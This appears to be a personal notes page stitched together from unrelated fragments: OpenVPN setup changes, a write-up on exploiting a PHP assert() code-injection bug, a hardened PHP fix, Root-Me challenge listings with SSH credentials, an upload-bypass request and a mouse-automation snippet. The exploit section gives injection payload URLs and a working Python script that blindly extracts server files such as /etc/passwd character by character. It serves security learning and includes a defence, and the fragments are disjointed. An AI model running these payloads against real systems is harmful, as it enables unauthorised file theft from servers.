Relay schematic
Works fine; changes made:
Port address changed, see /etc/openvpn/server.conf
cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0 /etc/openvpn/easy-rsa  BECOMES, WITH RECENT DEBIAN VERSIONS: cp -R /usr/share/easy-rsa/* /etc/openvpn/easy-rsa/
dh1024.pem BECOMES dh2048.pem
PHP assert() Vulnerable to Local File Inclusion
Consider the following URL:
http://example.com/inex.php/?page=home
The first thing that comes to mind on entering the site is an LFI attack through the “?page=” parameter. We should now try pointing it at files we know, such as “index.php” or “/etc/passwd”, to test for this vulnerability.
http://example.com/inex.php/?page=../../../../../etc/passwd
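The application replies with the message “Warning: assert(): Assertion “strpos(‘includes/’, ‘qwer’) === false && strlen(file_get_contents(“.passwd”)) == 0 && strpos(‘1.php’, ‘..’) === false” failed in /var/www/html/index.php on line 8”
-> The application uses the assert() function for its check, and the warning is printed when the assertion is FALSE. Because the check is passed to assert() as a string, PHP evaluates that string as code, so input placed inside it can change the expression.
The PHP code used by the application looks like the following: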
<?php
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    $page = "home";
}
$file = "includes/" . $page . ".php";
// The string below is evaluated as PHP code, with $file interpolated into it
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // vulnerable code!
?>
Let's try injecting code to read a file's contents using a blind technique.
http://example.com/inex.php/?page=’, ‘qwer’) === false && strlen(file_get_contents(“../../../../../etc/passwd”)) == 0 && strpos(‘1
-> The server responds with a message like “Warning: assert(): Assertion “strpos(‘includes/’, ‘qwer’) === false && strlen(file_get_contents(“../../../../../etc/passwd”)) == 0 && strpos(‘1.php’, ‘..’) === false” failed in /var/www/html/index.php on line 8” when the condition is FALSE.
http://example.com/inex.php//?page=’, ‘qwer’) === false && strlen(file_get_contents(“../../../../../etc/passwd”)) >0 && strpos(‘1
-> The server responds with a message like “File does not exist” when the condition is TRUE.
The server returns a warning with the message “Detected hacking attempt!” when the condition is FALSE, and “File does not exist” if the condition is TRUE.
The Python script to read a file's contents:
import base64
import string
import requests

url = "http://example.com/index.php/"

def check(payload):
    # True when the injected condition held (no assert() warning in the response)
    r = requests.get(url, params={'page': payload})
    return "Warning" not in r.text

# Closes the original strpos() call, inserts a condition, then reopens strpos()
base = "', 'qwer') === false && %s && strpos('1"

def get_len(path):
    # Find the file length: coarse steps of 10, then an exact match
    i = 10
    while True:
        payload = 'strlen(file_get_contents("%s")) < %d' % (path, i)
        if check(base % payload):
            for j in range(i - 10, i):
                payload = 'strlen(file_get_contents("%s")) == %d' % (path, j)
                if check(base % payload):
                    print("Found Length = %d" % j)
                    return j
        i += 10

def read_file_contents(path):
    # Recover the contents one character at a time by comparing prefixes
    length = get_len(path)
    s = ""
    while len(s) < length:
        for c in string.printable:
            tmp = s + c
            payload = 'substr(file_get_contents("%s"), 0, %d) == base64_decode("%s")' % (
                path, len(tmp), base64.b64encode(tmp.encode()).decode())
            if check(base % payload):
                s += c
                print(s)
                break
    return s

print(read_file_contents('../../../../../../etc/passwd'))
With this vulnerability, you can read all directories and files on the target server. The first thing to do is enumerate a directory blind using the following code: implode(" ", scandir('path_to_directory')). This code reads the directory with scandir() and converts the listing to a string with the implode() function.
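A hardened version of the include logic from this write-up, as an added example that is not part of the original post. The page names in ALLOWED_PAGES and the includes/ directory layout are assumptions; the `page` parameter and the error text follow the write-up.

```php
<?php
// Added example (not from the original write-up): the page selector without
// assert() on a string. ALLOWED_PAGES and the includes/ layout are assumptions.
//
// Related php.ini settings for production:
//   zend.assertions = -1   ; assert() calls are not compiled at all
//   display_errors  = Off  ; warnings no longer echo expressions to the client
// String arguments to assert() are deprecated since PHP 7.2 and are no longer
// evaluated as code in PHP 8.0.

const PAGES_DIR = __DIR__ . '/includes';
const ALLOWED_PAGES = ['home', 'about', 'contact']; // hypothetical page names

function resolve_page($requested): ?string
{
    // Reject arrays (?page[]=x) and anything outside the allowlist. The value
    // only selects a known name; it is never placed inside evaluated code.
    if (!is_string($requested) || !in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }

    // Defence in depth: canonicalise and confirm the file sits in includes/.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$file = resolve_page($_GET['page'] ?? 'home');
if ($file === null) {
    http_response_code(404);
    exit('File does not exist');
}
require $file;
```

Every rejected value gets the same 404 response, so the reply no longer distinguishes a true injected condition from a false one.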
Online tools for all sorts of manipulations! (strings: checksums, base64, compression, URL-encode/decode...; encryption, ...).
cheatsheet
r2 = requests.post("http://challenge01.root-me.org/web-serveur/ch20/?action=upload", files= {'file' : ('test4.php.png', open('/home/lubuntu/Images/code.php', 'rb'),'image/png')})
OWASP
Source code:
#include <stdlib.h>
#include <stdio.h>
/* gcc -m32 -o ch11 ch11.c */
int main(void)
{
        system("ls /challenge/app-script/ch11/.passwd");
        return 0;
}
Challenge connection parameters:
Host: challenge02.root-me.org
Protocol: SSH
Port: 2222
SSH access: ssh -p 2222 app-script-ch11@challenge02.root-me.org
Username: app-script-ch11
Password: app-script-ch11
2 related resource(s)
EN Dangers of SUID Shell Scripts (Administration/Unix)
EN SUID Privileged Programs (Administration/Unix)
Challenges published in this section: 15 challenges
Status         Challenge name                        Validations   Points
not validated  Bash - System 1                       16% 17350     5
not validated  sudo - weak configuration             11% 11705     5
not validated  Bash - System 2                       10% 10921     10
not validated  Perl - Command injection              5% 5414       15
not validated  Bash - cron                           5% 5536       20
not validated  Python - input()                      7% 7139       20
not validated  Python - pickle                       3% 2317       25
not validated  SSH Agent Hijacking                   1% 347        30
not validated  Python - PyJail 1                     3% 3026       35
not validated  Bash/Awk - parsing netstat            1% 164        40
not validated  Python - PyJail 2                     2% 1599       40
not validated  Python - Jail - Exec                  1% 669        50
not validated  Javascript - Jail                     1% 163        55
not validated  Python - Jail - Garbage collector     1% 174        55
not validated  Restricted shells                     1% 965        70
© 2010 - 2019
Root Me: learning platform dedicated to hacking and information security
from pynput.mouse import Button, Controller as Controller1
from pynput.keyboard import Key, Controller as Controller2
import time
mouse = Controller1()
mouse.position = (1200, 700)
mouse.press(Button.right)
mouse.release(Button.right)
mouse.position = (1250, 780)
time.sleep(0.1)
mouse.press(Button.left)
mouse.release(Button.left)
keyboard = Controller2()
time.sleep(1)
keyboard.press(Key.enter)
keyboard.release(Key.enter)